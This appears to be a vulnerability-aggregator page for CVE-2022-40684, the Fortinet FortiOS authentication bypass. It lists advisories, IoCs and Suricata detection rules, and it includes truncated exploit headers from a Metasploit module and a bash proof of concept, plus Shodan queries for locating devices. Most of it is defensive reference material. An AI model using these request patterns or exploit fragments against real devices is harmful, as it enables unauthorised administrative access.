CVE-2022-40684
published 2022-10-18CVE-2022-40684: An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-11-01
Exploited in the wild
EPSS
99.98%
100.0th percentile
An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortinet | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | >= 7.0.0 < 7.0.7 | 7.0.7 |
| fortinet | fortios | >= 7.2.0 < 7.2.2 | 7.2.2 |
| fortinet | fortiproxy | — | — |
| fortinet | fortiproxy | — | — |
| fortinet | fortiproxy | >= 7.0.0 < 7.0.7 | 7.0.7 |
| fortinet | fortiswitchmanager | — | — |
| fortinet | fortiswitchmanager | — | — |
| fortinet | fortiswitchmanager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for configuration files obtained by the user 'Local_Process_Access' as an IoC of CVE-2022-40684 exploitation — this is an abnormal access context indicating the auth bypass was used. ↗
- →Detect the presence of a malicious admin account named 'fortigate-tech-support' created on FortiGate devices as an IoC of post-exploitation activity via CVE-2022-40684. ↗
- →Validate FortiGate configuration for unauthorized changes; devices running FortiOS 7.0.0–7.0.6 or 7.2.0–7.2.1 prior to November 2022 are the confirmed vulnerable population. ↗
- →CVE-2022-40684 exploitation is performed via specially crafted HTTP or HTTPS requests to the management interface; monitor for anomalous admin-plane HTTP/HTTPS traffic from untrusted sources. ↗
- →Check for the two known IoCs (Local_Process_Access config access and fortigate-tech-support admin account) documented under FG-IR-22-377 when hunting for CVE-2022-40684 compromise. ↗
- ·The leaked FortiGate data (config.conf + vpn-password.txt) originates from exploitation of CVE-2022-40684 prior to November 2022; configs only cover FortiOS 7.0.x (up to 7.0.6) and 7.2.x (up to 7.2.1) — no 7.4 or 7.6 configs are present, confirming the older vulnerable version scope. ↗
- ·Devices purchased since December 2022 or devices that have only ever run FortiOS 7.2.2 or above are confirmed not impacted by CVE-2022-40684. ↗
- ·The vpn-password.txt files in the leak were modified by a Python script (1.py) to rename files and insert the threat actor's moniker — the underlying credential data matches the older CVE-2018-13379 (FG-IR-18-384) disclosure, not a new breach. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Fortinet
Authentication bypass in administrative interface
vendor_fortinet·2022-10-18·CVSS 9.8
CVE-2022-40684 [CRITICAL] CWE-287 Authentication bypass in administrative interface
FG-IR-22-377: Authentication bypass in administrative interface
An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
CVEs: CVE-2022-40684
CWEs: CWE-287
CVSS: 9.8 (critical)
Affected products: FortiOS, FortiProxy, FortiSwitchManager, FortiSwitchmanager, Fortinet
CISA
Fortinet Multiple Products Authentication Bypass Vulnerability
cisa·2022-10-11·CVSS 9.8
CVE-2022-40684 [CRITICAL] CWE-288 Fortinet Multiple Products Authentication Bypass Vulnerability
Vulnerability: Fortinet Multiple Products Authentication Bypass Vulnerability
Affected: Fortinet Multiple Products
Fortinet FortiOS, FortiProxy, and FortiSwitchManager contain an authentication bypass vulnerability that could allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Required Action: Apply updates per vendor instructions.
Notes: https://www.fortiguard.com/psirt/FG-IR-22-377; https://nvd.nist.gov/vuln/detail/CVE-2022-40684
Remediation Due Date: 2022-11-01
GHSA
GHSA-m3wm-rjvf-m778: An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7
ghsa_unreviewed·2022-10-18
CVE-2022-40684 [CRITICAL] CWE-287 GHSA-m3wm-rjvf-m778: An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7
An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
VulnCheck
Fortinet Multiple Products Authentication Bypass Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-40684 [CRITICAL] CWE-288 Fortinet Multiple Products Authentication Bypass Vulnerability
Fortinet Multiple Products Authentication Bypass Vulnerability
Fortinet FortiOS, FortiProxy, and FortiSwitchManager contain an authentication bypass vulnerability that could allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Affected: Fortinet Multiple Products
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.fortiguard.com/psirt/FG-IR-22-377; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2022-40684; https://blog.cyble.com/2022/11/24/multiple-organisations-compromised-by-critical-authentication-bypass-vulnerability-in-fortinet-pro
Suricata
ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Config Leaked (CVE-2022-40684)
suricata·2022-10-20·CVSS 9.8
CVE-2022-40684 [CRITICAL] ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Config Leaked (CVE-2022-40684)
ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Config Leaked (CVE-2022-40684)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> $EXTERNAL_NET any (msg:"ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Config Leaked (CVE-2022-40684)"; flow:established,to_client; flowbits:isset,ET.CVE-2022-40684; http.response_body; content:"#config-version="; startswith; content:"user=Local_Process_Access|0a|#conf_file_ver="; within:500; fast_pattern; content:"|0a|#buildno="; within:500; reference:url,www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/; reference:url,github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py; reference:cve,2022-40684; classtype:successful-admin; sid:2039485; rev:1; metadata:affected_produ
Suricata
ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Administrative Details Leaked (CVE-2022-40684)
suricata·2022-10-17·CVSS 9.8
CVE-2022-40684 [CRITICAL] ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Administrative Details Leaked (CVE-2022-40684)
ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Administrative Details Leaked (CVE-2022-40684)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> $EXTERNAL_NET any (msg:"ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - Administrative Details Leaked (CVE-2022-40684)"; flow:established,to_client; flowbits:isset,ET.CVE-2022-40684; http.response_body; content:"results"; nocase; content:"accprofile"; nocase; fast_pattern; reference:url,www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/; reference:url,github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py; reference:cve,2022-40684; classtype:successful-admin; sid:2039420; rev:1; metadata:affected_product Web_Server_Applications, affected_product Fortigate,
Suricata
ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - SSH Key Upload (CVE-2022-40684)
suricata·2022-10-17·CVSS 9.8
CVE-2022-40684 [CRITICAL] ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - SSH Key Upload (CVE-2022-40684)
ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - SSH Key Upload (CVE-2022-40684)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> $EXTERNAL_NET any (msg:"ET WEB_SERVER Successful FortiOS Auth Bypass Attempt - SSH Key Upload (CVE-2022-40684)"; flow:established,to_client; flowbits:isset,ET.CVE-2022-40684; http.response_body; content:"SSH key is good"; nocase; fast_pattern; reference:url,www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/; reference:url,github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py; reference:cve,2022-40684; classtype:successful-admin; sid:2039419; rev:1; metadata:affected_product Web_Server_Applications, affected_product Fortigate, attack_target Server, created_at 2022_10_17, cve CVE
Suricata
ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684)
suricata·2022-10-12·CVSS 9.8
CVE-2022-40684 [CRITICAL] ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684)
ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684)"; flow:established,to_server; flowbits:set,ET.CVE-2022-40684; http.uri; content:"/api/v2/"; startswith; nocase; content:"/system/"; nocase; distance:0; http.request_header; header_lowercase; content:"forwarded|3a 20|"; startswith; content:"for|3d 22 5b|127|2e|0|2e|0|2e|1|5d 3a|"; nocase; fast_pattern; pcre:"/^Forwarded\x3a\x20[^\r\n]*for=\x22\x5b127\.0\.0\.1\x5d\x3a/i"; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/; reference:ur
Exploit-DB
Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass
exploitdb·2025-04-16·CVSS 9.8
CVE-2022-40684 [CRITICAL] Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass
Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass
---
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
# Date: 2022-10-10
# Exploit Author: Zach Hanley, SC
# Vendor Homepage: https://www.fortinet.com
# Version: 7.0.0
# Tested on: Linux
# CVE : CVE-2022-40684
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
to gain access to a chosen account. And then add a SSH key to the
a
Exploit-DB
FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
exploitdb·2023-03-27·CVSS 9.8
CVE-2022-40684 [CRITICAL] FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
---
# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
# Date: 13/10/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.fortinet.com/
# Version:
#FortiOS from 7.2.0 to 7.2.1
#FortiOS from 7.0.0 to 7.0.6
#FortiProxy 7.2.0
#FortiProxy from 7.0.0 to 7.0.6
#FortiSwitchManager 7.2.0
#FortiSwitchManager 7.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-40684
# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass
# Usage: ./poc.sh
# Example: ./poc.sh 10.10.10.120 8443
#!/bin/bash
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
yellow="\e[0;33m\033[1m"
end="\033[0m\e[0m"
target=$1
port=$2
vuln () {
echo -e "${yellow}[+] Dumping System Informatio
Nuclei
FortiOS Admin Login Panel - Detect
nuclei
CVE-2022-40684 FortiOS Admin Login Panel - Detect
FortiOS Admin Login Panel - Detect
FortiOS admin login panel was detected.
Template:
id: fortios-panel
info:
name: FortiOS Admin Login Panel - Detect
author: canberbamber,Jna1
severity: info
description: |
FortiOS admin login panel was detected.
reference:
- https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: fortinet
product: fortios
shodan-query:
- http.favicon.hash:945408572
- cpe:"cpe:2.3:o:fortinet:fortios"
- port:10443 http.favicon.hash:945408572
- http.html:"/remote/login" "xxxxxxxx"
fofa-query:
- body="/remote/login" "xxxxxxxx"
- icon_hash=945408572
tags: panel,fortinet,fortios,discovery
htt
Metasploit
Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
metasploit
Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
This module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account. And then add a SSH key to the authorized_keys file of the chosen account, allowing to login to the system with the chosen account. Successful exploitation results in remote code execution.
Nuclei
Fortinet - Authentication Bypass
nuclei·CVSS 9.8
CVE-2022-40684 [CRITICAL] Fortinet - Authentication Bypass
Fortinet - Authentication Bypass
Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2022-40684
info:
name: Fortinet - Authentication Bypass
author: Shockwave,nagli,carlosvieira
severity: critical
description: |
Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProx
Recorded Future
June 2026 CVE Landscape
blogs_recorded_future·2026-07-10·CVSS 9.1
CVE-2026-35616 [CRITICAL] June 2026 CVE Landscape
## June 2026 CVE Landscape
In June 2026, Insikt Group® identified 60 high-impact vulnerabilities that should be prioritized for remediation , 30 of which had a Very Critical Recorded Future Risk Score. This represents a 49% increase from last month. 23 of the 60 vulnerabilities were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, 34 were reported by vendors, and three were primarily surfaced through honeypot data.
The 60 vulnerabilities in this report affected products from 36 vendors, with Microsoft accounting for approximately 18% of the vulnerabilities. The remaining exposure was concentrated across a range of enterprise software, security products, network infrastructure, developer tooling, and cloud platform
Qualys
FortiBleed: Credential Reuse, Legacy Hashes, and the Risk of Internet-Exposed FortiGate Devices
blogs_qualys·2026-07-08
CVE-2026-24858 FortiBleed: Credential Reuse, Legacy Hashes, and the Risk of Internet-Exposed FortiGate Devices
## Table of Contents
Summary
What Happened
Who should pay attention
WhyIt Matters/ Potential Impact
Recommended Actions
CVEs and Affected Components
Exploitation Status / Threat Activity
Remediation Long Tail: Why Historical Exposure Persists
How Qualys Helps You Discover These Exposures
Use Qualys QueryLanguageto PrioritizeFortiBleedExposure
Detection and Threat Hunting Guidance
Conclusion
Contributor
Frequently Asked Questions (FAQs)
## Key Takeaways
FortiBleed refers to June 2026 public reporting of large-scale credential exposure and abuse targeting internet-reachable FortiGate management and SSL-VPN gateways driven by credential reuse and brute-force, not a single new zero-day.
Risk is highest for internet-exposed FortiGate devices without MFA, with reused or legacy-h
Hackernews
New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
blogs_hackernews·2026-06-26·CVSS 9.8
CVE-2021-26855 [CRITICAL] New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
A newly discovered cyber attack campaign has been observed delivering a previously undocumented malware family called SharkLoader that acts as a loader for deploying Cobalt Strike Beacon on compromised hosts.
Kaspersky, which is tracking the activity under the moniker StrikeShark , said the campaign has targeted a diplomatic organization in Indonesia, government organizations in Taiwan, software development companies across multiple countries, and entities associated with other sectors located in Hong Kong, Lebanon, Syria, Colombia, North Macedonia, Ne
Securelist
StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader
blogs_securelist·2026-06-24
CVE-2021-26855 StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader
Fareed Radzi
Table of Contents
Introduction
Initial infection
Exploitation of public-facing applications
Dropper-based distribution
SharkLoader installation
SharkLoader DLL – Main implant
“PerfectDLL Hijacking” technique
Decryption and loading of >DscCoreR.mui
DscCoreR.mui and SyncRes.dat DLLs
Decryption and loading of SyncRes.dat
SyncRes.dat decrypted DLL: Multiple API hooks
VEH registration and access violation handling
Thread creation for Cobalt Strike Beacon execution
MinHook DLL, API hooking, and Cobalt Strike beacon
Persistence mechanism
Post-compromise activity
Victimology
Attribution
Conclusion
Indicators of compromise
Authors
Fareed Radzi
## Introduction
During our research of activity affecting a diplomatic organization in Indonesia, we uncovered a previo
Tenable
CVE-2026-35616: Fortinet FortiClientEMS improper access control vulnerability exploited in the wild
blogs_tenable·2026-04-06·CVSS 9.8
[CRITICAL] CVE-2026-35616: Fortinet FortiClientEMS improper access control vulnerability exploited in the wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2025-64155 PoC released Command Injection Vulnerability
blogs_tenable·2026-01-14·CVSS 9.8
[CRITICAL] CVE-2025-64155 PoC released Command Injection Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2025-64446 FortiWeb Zero-Day Exploited
blogs_tenable·2025-11-14·CVSS 9.8
[CRITICAL] CVE-2025-64446 FortiWeb Zero-Day Exploited
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks
blogs_bleepingcomputer·2025-11-14·CVSS 9.8
[CRITICAL] Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks
## Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks
## Sergiu Gatlan
Fortinet has confirmed that it has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now " massively exploited in the wild."
The flaw was silently patched after reports that unauthenticated attackers were exploiting an unknown FortiWeb path traversal flaw in early October to create new administrative users on Internet-exposed devices.
The attacks were first identified by threat intel firm Defused on October 6, which published a proof-of-concept exploit and reported that an "unknown Fortinet exploit (possibly a CVE-2022-40684 variant)" is being used to send HTTP POST requests to the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi
Tenable
CVE-2025-25256: Proof of Concept Released for Critical Fortinet FortiSIEM Command Injection Vulnerability
blogs_tenable·2025-08-13·CVSS 9.8
[CRITICAL] CVE-2025-25256: Proof of Concept Released for Critical Fortinet FortiSIEM Command Injection Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2025-32756: Zero-Day Vulnerability in Multiple Fortinet Products Exploited in the Wild
blogs_tenable·2025-05-14·CVSS 9.8
[CRITICAL] CVE-2025-32756: Zero-Day Vulnerability in Multiple Fortinet Products Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
Hackers Actively Exploiting Fortinet Firewalls: Real-Time Insights from GreyNoise
blogs_greynoiseio·2025-01-28·CVSS 9.8
[CRITICAL] Hackers Actively Exploiting Fortinet Firewalls: Real-Time Insights from GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Fortinet
Analysis of Threat Actor Data Posting | Fortinet Blog
blogs_fortinet·2025-01-16
Analysis of Threat Actor Data Posting | Fortinet Blog
PSIRT BLOGS
Analysis of Threat Actor Data Posting
By Carl Windsor | January 16, 2025
Affected Platforms: FortiOS 7.0.0 – 7.0.6 and 7.2.0 – 7.2.1
Impacted Users: Various
Impact: Configuration and VPN Password Exposure
Severity Level: High
Executive Summary
Fortinet is aware of a posting by a threat actor which claims to offer compromised configuration and VPN credentials from FortiGate devices. Based on our analysis, the data involved is a resharing of data from previous incidents from dates prior to November 2022 and is not related to any recent incident or advisory. The following provides factual information to help our customers better understand the situation and make informed decisions.
Threat Actor Posting
Fortinet discovered the posting on a forum via the FortiRecon Dark Web Ac
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Akira Ransomware Analysis Origins Tactics and Detection Strategies
blogs_qualys·2024-10-02·CVSS 6.5
[MEDIUM] Akira Ransomware Analysis Origins Tactics and Detection Strategies
## Table of Contents
What is Akira Ransomware? An Overview
Tactics, Techniques, and Procedures (TTPs) Used by Akira
Analyzing Akira Ransomware Samples
How to Detect Akira: Threat Hunting Approaches
Wrapping Up: Key Takeaways on Akira Ransomware
Akira Ransomware in the MITRE ATT&CK Framework
Indicators of Compromise (IoCs) for Akira
## What is Akira Ransomware? An Overview
Akira is a prolific ransomware that has been operating since March 2023 and has targeted multiple industries, primarily in North America, the UK, and Australia. It functions as a Ransomware as a Service (RaaS) and exfiltrates data prior to encryption, achieving double extortion. According to the group’s leak site, they have infected over 196 organizations.
When looking at the history of Akira, one must go back t
Tenable
CVE-2023-48788: Critical Fortinet FortiClientEMS SQL Injection Vulnerability
blogs_tenable·2024-03-14·CVSS 9.8
[CRITICAL] CVE-2023-48788: Critical Fortinet FortiClientEMS SQL Injection Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
blogs_tenable·2024-02-09·CVSS 9.8
[CRITICAL] CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
blogs_trendmicro·2023-09-18
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
Malware
## Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
While monitoring Earth Lusca, we discovered an intriguing, encrypted file on the threat actor's server — a Linux-based malware, which appears to originate from the open-source Windows backdoor Trochilus, which we've dubbed SprySOCKS due to its swift behavior and SOCKS implementation.
By: Joseph C Chen 2023/09/18 Read time: ( words)
Save to Folio
In early 2021, we published a research paper discussing the operation of a China-linked threat actor we tracked as Earth Lusca . Since our initial research, the group has remained active and has even extended its operations, targeting countries around the world during the first half of 2023.
While monitoring the group, we managed to obtain an interestin
Trendmicro
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
blogs_trendmicro·2023-09-18
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
Malware
# Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
While monitoring Earth Lusca, we discovered an intriguing, encrypted file on the threat actor's server — a Linux-based malware, which appears to originate from the open-source Windows backdoor Trochilus, which we've dubbed SprySOCKS due to its swift behavior and SOCKS implementation.
By: Joseph C Chen
2023/09/18
Read time: ( words)
Save to Folio
In early 2021, we published a research paper discussing the operation of a China-linked threat actor we tracked as Earth Lusca. Since our initial research, the group has remained active and has even extended its operations, targeting countries around the world during the first half of 2023.
